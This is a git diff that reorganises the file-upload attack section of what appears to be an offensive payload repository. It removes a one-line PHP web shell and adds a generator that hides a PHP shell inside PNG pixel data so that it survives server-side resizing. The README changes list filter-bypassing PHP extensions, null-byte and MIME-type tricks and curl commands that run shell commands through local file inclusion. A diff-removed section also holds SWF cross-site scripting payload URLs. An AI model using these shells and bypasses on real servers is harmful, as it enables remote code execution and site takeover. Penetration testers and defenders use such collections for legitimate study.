diff --git a/Upload insecure files/JPG Resize/exploit-85.jpg b/Upload insecure files/JPG Resize/exploit-85.jpg
deleted file mode 100755
index 3ab8a9f..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-85.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-86.jpg b/Upload insecure files/JPG Resize/exploit-86.jpg
deleted file mode 100755
index 6b17541..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-86.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-87.jpg b/Upload insecure files/JPG Resize/exploit-87.jpg
deleted file mode 100755
index ab386cb..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-87.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-88.jpg b/Upload insecure files/JPG Resize/exploit-88.jpg
deleted file mode 100755
index 0290756..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-88.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-89.jpg b/Upload insecure files/JPG Resize/exploit-89.jpg
deleted file mode 100755
index f7e067b..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-89.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-90.jpg b/Upload insecure files/JPG Resize/exploit-90.jpg
deleted file mode 100755
index 1371229..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-90.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-91.jpg b/Upload insecure files/JPG Resize/exploit-91.jpg
deleted file mode 100755
index 9809587..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-91.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-92.jpg b/Upload insecure files/JPG Resize/exploit-92.jpg
deleted file mode 100755
index 5b213e5..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-92.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-93.jpg b/Upload insecure files/JPG Resize/exploit-93.jpg
deleted file mode 100755
index 17746e9..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-93.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-94.jpg b/Upload insecure files/JPG Resize/exploit-94.jpg
deleted file mode 100755
index 22253d7..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-94.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-95.jpg b/Upload insecure files/JPG Resize/exploit-95.jpg
deleted file mode 100755
index 4dbdb4a..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-95.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-96.jpg b/Upload insecure files/JPG Resize/exploit-96.jpg
deleted file mode 100755
index e5d7da5..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-96.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-97.jpg b/Upload insecure files/JPG Resize/exploit-97.jpg
deleted file mode 100755
index bb6b08f..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-97.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-98.jpg b/Upload insecure files/JPG Resize/exploit-98.jpg
deleted file mode 100755
index 8a4c53f..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-98.jpg and /dev/null differ
diff --git a/Upload insecure files/Metadata GIF/shell_fr.gif b/Upload insecure files/Metadata GIF/shell_fr.gif
deleted file mode 100755
index 10ce64b..0000000
Binary files a/Upload insecure files/Metadata GIF/shell_fr.gif and /dev/null differ
diff --git a/Upload insecure files/Metadata GIF/shell_problem.gif b/Upload insecure files/Metadata GIF/shell_problem.gif
deleted file mode 100755
index 1379a50..0000000
Binary files a/Upload insecure files/Metadata GIF/shell_problem.gif and /dev/null differ
diff --git a/Upload insecure files/PHP Extension/shell.shtml b/Upload insecure files/PHP Extension/shell.shtml
deleted file mode 100755
index b1abb37..0000000
--- a/Upload insecure files/PHP Extension/shell.shtml	
+++ /dev/null
@@ -1 +0,0 @@
-<?php echo "Shell";system($_GET['cmd']); ?>
\ No newline at end of file
diff --git a/Upload insecure files/Metadata PNG/Build_image_to_LFI.py b/Upload insecure files/Picture Metadata/Build_image_to_LFI.py
similarity index 100%
rename from Upload insecure files/Metadata PNG/Build_image_to_LFI.py
rename to Upload insecure files/Picture Metadata/Build_image_to_LFI.py
diff --git a/Upload insecure files/Metadata PNG/phpinfo-metadata.jpg b/Upload insecure files/Picture Metadata/PHP_exif_phpinfo.jpg
similarity index 100%
rename from Upload insecure files/Metadata PNG/phpinfo-metadata.jpg
rename to Upload insecure files/Picture Metadata/PHP_exif_phpinfo.jpg
diff --git a/Upload insecure files/Metadata GIF/shell_cinema.gif b/Upload insecure files/Picture Metadata/PHP_exif_system.gif
similarity index 100%
rename from Upload insecure files/Metadata GIF/shell_cinema.gif
rename to Upload insecure files/Picture Metadata/PHP_exif_system.gif
diff --git a/Upload insecure files/Picture Metadata/PHP_exif_system.jpg b/Upload insecure files/Picture Metadata/PHP_exif_system.jpg
new file mode 100644
index 0000000..385af5a
Binary files /dev/null and b/Upload insecure files/Picture Metadata/PHP_exif_system.jpg differ
diff --git a/Upload insecure files/Metadata PNG/php_exif_data.png b/Upload insecure files/Picture Metadata/PHP_exif_system.png
similarity index 100%
rename from Upload insecure files/Metadata PNG/php_exif_data.png
rename to Upload insecure files/Picture Metadata/PHP_exif_system.png
diff --git a/Upload insecure files/Metadata GIF/phpinfo-metadata.gif b/Upload insecure files/Picture Resize/GIF_exploit.gif
similarity index 100%
rename from Upload insecure files/Metadata GIF/phpinfo-metadata.gif
rename to Upload insecure files/Picture Resize/GIF_exploit.gif
diff --git a/Upload insecure files/JPG Resize/exploit-55.jpg b/Upload insecure files/Picture Resize/JPG_exploit-55.jpg
similarity index 100%
rename from Upload insecure files/JPG Resize/exploit-55.jpg
rename to Upload insecure files/Picture Resize/JPG_exploit-55.jpg
diff --git a/Upload insecure files/PNG Resize/110x110_resize_bypass_use_LFI.png b/Upload insecure files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png
similarity index 100%
rename from Upload insecure files/PNG Resize/110x110_resize_bypass_use_LFI.png
rename to Upload insecure files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png
diff --git a/Upload insecure files/PNG Resize/32x32_resize_bypass_use_LFI.png b/Upload insecure files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png
similarity index 100%
rename from Upload insecure files/PNG Resize/32x32_resize_bypass_use_LFI.png
rename to Upload insecure files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png
diff --git a/Upload insecure files/JPG Resize/README.txt b/Upload insecure files/Picture Resize/README.txt
similarity index 100%
rename from Upload insecure files/JPG Resize/README.txt
rename to Upload insecure files/Picture Resize/README.txt
diff --git a/Upload insecure files/JPG Resize/bulletjpg.py b/Upload insecure files/Picture Resize/exploit_JPG.py
similarity index 100%
rename from Upload insecure files/JPG Resize/bulletjpg.py
rename to Upload insecure files/Picture Resize/exploit_JPG.py
diff --git a/Upload insecure files/Picture Resize/exploit_PNG_110x110.php b/Upload insecure files/Picture Resize/exploit_PNG_110x110.php
new file mode 100644
index 0000000..95c4180
--- /dev/null
+++ b/Upload insecure files/Picture Resize/exploit_PNG_110x110.php	
@@ -0,0 +1,22 @@
+<?
+ 
+header('Content-Type: image/png');
+ 
+$p = array(0xA3, 0x9F, 0x67, 0xF7, 0x0E, 0x93, 0x1B, 0x23, 0xBE, 0x2C, 0x8A, 0xD0, 0x80, 0xF9, 0xE1, 0xAE, 0x22, 0xF6, 0xD9, 0x43, 0x5D, 0xFB, 0xAE, 0xCC, 0x5A, 0x01, 0xDC, 0xAA, 0x52, 0xD0, 0xB6, 0xEE, 0xBB, 0x3A, 0xCF, 0x93, 0xCE, 0xD2, 0x88, 0xFC, 0x69, 0xD0, 0x2B, 0xB9, 0xB0, 0xFB, 0xBB, 0x79, 0xFC, 0xED, 0x22, 0x38, 0x49, 0xD3, 0x51, 0xB7, 0x3F, 0x02, 0xC2, 0x20, 0xD8, 0xD9, 0x3C, 0x67, 0xF4, 0x50, 0x67, 0xF4, 0x50, 0xA3, 0x9F, 0x67, 0xA5, 0xBE, 0x5F, 0x76, 0x74, 0x5A, 0x4C, 0xA1, 0x3F, 0x7A, 0xBF, 0x30, 0x6B, 0x88, 0x2D, 0x60, 0x65, 0x7D, 0x52, 0x9D, 0xAD, 0x88, 0xA1, 0x66, 0x94, 0xA1, 0x27, 0x56, 0xEC, 0xFE, 0xAF, 0x57, 0x57, 0xEB, 0x2E, 0x20, 0xA3, 0xAE, 0x58, 0x80, 0xA7, 0x0C, 0x10, 0x55, 0xCF, 0x09, 0x5C, 0x10, 0x40, 0x8A, 0xB9, 0x39, 0xB3, 0xC8, 0xCD, 0x64, 0x45, 0x3C, 0x49, 0x3E, 0xAD, 0x3F, 0x33, 0x56, 0x1F, 0x19 );
+ 
+$img = imagecreatetruecolor(110, 110);
+ 
+for ($y = 0; $y < sizeof($p); $y += 3) {
+$r = $p[$y];
+$g = $p[$y+1];
+$b = $p[$y+2];
+$color = imagecolorallocate($img, $r, $g, $b);
+imagesetpixel($img, round($y / 3)*2, 0, $color);
+imagesetpixel($img, round($y / 3)*2+1, 0, $color);
+imagesetpixel($img, round($y / 3)*2, 1, $color);
+imagesetpixel($img, round($y / 3)*2+1, 1, $color);
+}
+ 
+imagepng($img);
+ 
+?>
\ No newline at end of file
diff --git a/Upload insecure files/README.md b/Upload insecure files/README.md
index 207c280..35d7fb5 100644
--- a/Upload insecure files/README.md	
+++ b/Upload insecure files/README.md	
@@ -4,7 +4,49 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at
 
 ## Exploits
 
-### Image Tragik
+### PHP Extension
+
+```powershell
+.php
+.php3
+.php4
+.php5
+.php7
+
+Less known extensions
+.pht
+.phar
+.phpt
+.pgif
+.phtml
+
+Double extensions
+.jpeg.php
+.jpg.php
+.png.php
+```
+
+### Upload tricks
+
+- Null byte (eg: shell.php%00.gif, shell.php%00.png)
+- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
+
+### Picture upload with LFI
+
+Valid pictures hosting PHP code. Upload the picture and use a local file inclusion to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
+
+- Picture Metadata, hide the payload inside a comment tag in the metadata.
+- Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`.
+
+### Configuration Files
+
+- .htaccess
+- web.config
+- httpd.conf
+- \_\_init\_\_.py
+
+
+### CVE - Image Tragik
 
 ```powershell
 HTTP Request
@@ -12,57 +54,9 @@ Reverse Shell
 Touch command
 ```
 
-### PHP Extension
-
-```powershell
-.php
-
-Less known extension
-.pht
-.pgif
-.phtml
-.shtml
-
-Double extension
-.jpeg.php
-.png.php
-```
-
-### PNG Bypass a resize
-
-Upload the picture and use a local file inclusion
-
-```powershell
-You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
-curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
-curl 'http://localhost/test.php?0=system' --data "1='ls'"
-```
-
-### JPG Bypass a resize
-
-Upload the picture and use a local file inclusion
-
-```powershell
-http://localhost/test.php?c=ls
-```
-
-### XSS via SWF
-
-As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
-This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
-
-```powershell
-Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
-
-IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
-
-IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
-```
-
-### .htaccess
-
-An .htaccess file is a way to configure the details of your website without needed to alter the server config files. 
-
 ## References
 
 * Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
+* [BookFresh Tricky File Upload Bypass to RCE, NOV 29, 2014 - AHMED ABOUL-ELA](https://secgeek.net/bookfresh-vulnerability/)
+* [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
+* [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
\ No newline at end of file
diff --git a/Upload insecure files/IIS/index.stm b/Upload insecure files/Server Side Include/index.stm
similarity index 100%
rename from Upload insecure files/IIS/index.stm
rename to Upload insecure files/Server Side Include/index.stm